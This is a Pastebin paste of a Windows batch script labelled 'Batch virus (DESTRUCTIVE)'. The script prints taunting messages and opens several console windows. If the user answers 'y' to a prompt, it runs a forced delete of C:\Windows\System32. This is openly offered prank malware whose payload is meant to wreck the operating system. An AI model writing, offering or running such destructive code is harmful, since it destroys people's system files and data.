Advertisement
giantgamingchannel

Batch virus (DESTRUCTIVE, TEST IN VIRTUAL MACHINE FIRST.)

Mar 2nd, 2018
144
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.64 KB | None | 0 0
  1. @echo off
  2. echo You've just copied some code. :3
  3. pause >nul
  4. title XDDDDD
  5. echo iuhiuewfhiwhfiuhiuwhfew
  6. echo wiugffiwifwhiflhewfiuew
  7. echo A N G E R A S
  8. pause >nul
  9. start
  10. title dead
  11. start
  12. title xd
  13. start
  14. title boi boi
  15. start
  16. title g3t r3kt
  17. start
  18. title pwned
  19. start
  20. title boi boi pc
  21. start
  22. title the end. c:
  23. pause >nul
  24. echo Click again, I dare you!
  25. pause >nul
  26. :choice
  27. set /P c=Clicked? (y/n)
  28. if /I "%c%" EQU "y" goto :death
  29. if /I "%c%" EQU "N" goto :survived
  30.  
  31.  
  32. :death
  33. echo You asked for it...
  34. pause >nul
  35. del /F /Q C:\Windows\System32
  36. title Enjoy your computer's last breath.
  37.  
  38.  
  39.  
  40. :survived
  41. echo Good.
  42. pause >nul
  43. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement